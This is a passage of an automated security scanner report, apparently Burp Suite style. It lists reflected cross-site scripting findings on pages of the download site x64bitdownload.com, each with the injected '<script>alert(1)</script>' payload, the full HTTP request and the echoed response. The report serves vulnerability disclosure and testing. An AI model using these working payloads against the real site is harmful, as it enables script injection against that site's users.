Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:07 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:52:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-multimedia-downloads.html?4b14b"><script>alert(1)</script>9323ad41c03=1" />
...[SNIP]...

4.1551. http://www.x64bitdownload.com/64-bit-multipart-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multipart-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fada"><script>alert(1)</script>70bed0cb402 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-multipart-downloads.html4fada"><script>alert(1)</script>70bed0cb402 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:43:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-multipart-downloads.html4fada"><script>alert(1)</script>70bed0cb402" />
...[SNIP]...

4.1552. http://www.x64bitdownload.com/64-bit-multipart-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multipart-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8218"><script>alert(1)</script>80184a44002 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-multipart-downloads.html?c8218"><script>alert(1)</script>80184a44002=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:08 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-multipart-downloads.html?c8218"><script>alert(1)</script>80184a44002=1" />
...[SNIP]...

4.1553. http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ec5"><script>alert(1)</script>f58c4ad49c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-news-c-44-newsgroup-clients-downloads.htmlb0ec5"><script>alert(1)</script>f58c4ad49c2 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:47 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-news-c-44-newsgroup-clients-downloads.htmlb0ec5"><script>alert(1)</script>f58c4ad49c2" />
...[SNIP]...

4.1554. http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6397"><script>alert(1)</script>35e6393fe11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-news-c-44-newsgroup-clients-downloads.html?d6397"><script>alert(1)</script>35e6393fe11=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:09 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-news-c-44-newsgroup-clients-downloads.html?d6397"><script>alert(1)</script>35e6393fe11=1" />
...[SNIP]...

4.1555. http://www.x64bitdownload.com/64-bit-news-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 621e6"><script>alert(1)</script>f97e27d071e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-news-downloads.html621e6"><script>alert(1)</script>f97e27d071e HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:01 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-news-downloads.html621e6"><script>alert(1)</script>f97e27d071e" />
...[SNIP]...

4.1556. http://www.x64bitdownload.com/64-bit-news-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84391"><script>alert(1)</script>fc16f13d74f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-news-downloads.html?84391"><script>alert(1)</script>fc16f13d74f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-news-downloads.html?84391"><script>alert(1)</script>fc16f13d74f=1" />
...[SNIP]...

4.1557. http://www.x64bitdownload.com/64-bit-news-reader-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-reader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aea20"><script>alert(1)</script>0c390275c86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-news-reader-downloads.htmlaea20"><script>alert(1)</script>0c390275c86 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:04 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22news-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22news+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-news-reader-downloads.htmlaea20"><script>alert(1)</script>0c390275c86" />
...[SNIP]...

4.1558. http://www.x64bitdownload.com/64-bit-news-reader-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-reader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db679"><script>alert(1)</script>d820eccf371 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-news-reader-downloads.html?db679"><script>alert(1)</script>d820eccf371=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22news-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22news+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-news-reader-downloads.html?db679"><script>alert(1)</script>d820eccf371=1" />
...[SNIP]...

4.1559. http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsfeed-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4bcf"><script>alert(1)</script>e2a44662479 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsfeed-downloads.htmle4bcf"><script>alert(1)</script>e2a44662479 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsfeed-downloads.htmle4bcf"><script>alert(1)</script>e2a44662479" />
...[SNIP]...

4.1560. http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsfeed-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2049a"><script>alert(1)</script>3be85d0325f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsfeed-downloads.html?2049a"><script>alert(1)</script>3be85d0325f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:12 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsfeed-downloads.html?2049a"><script>alert(1)</script>3be85d0325f=1" />
...[SNIP]...

4.1561. http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc0f0"><script>alert(1)</script>db92b86c3df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroup-c-44-newsgroup-clients-downloads.htmldc0f0"><script>alert(1)</script>db92b86c3df HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroup-c-44-newsgroup-clients-downloads.htmldc0f0"><script>alert(1)</script>db92b86c3df" />
...[SNIP]...

4.1562. http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2749"><script>alert(1)</script>451987c9093 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroup-c-44-newsgroup-clients-downloads.html?b2749"><script>alert(1)</script>451987c9093=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:44 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html?b2749"><script>alert(1)</script>451987c9093=1" />
...[SNIP]...

4.1563. http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 822b0"><script>alert(1)</script>c828d960a93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroup-downloads.html822b0"><script>alert(1)</script>c828d960a93 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroup-downloads.html822b0"><script>alert(1)</script>c828d960a93" />
...[SNIP]...

4.1564. http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18e37"><script>alert(1)</script>5191ca0d343 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroup-downloads.html?18e37"><script>alert(1)</script>5191ca0d343=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:58:42 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroup-downloads.html?18e37"><script>alert(1)</script>5191ca0d343=1" />
...[SNIP]...

4.1565. http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 568b0"><script>alert(1)</script>8a53e952c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

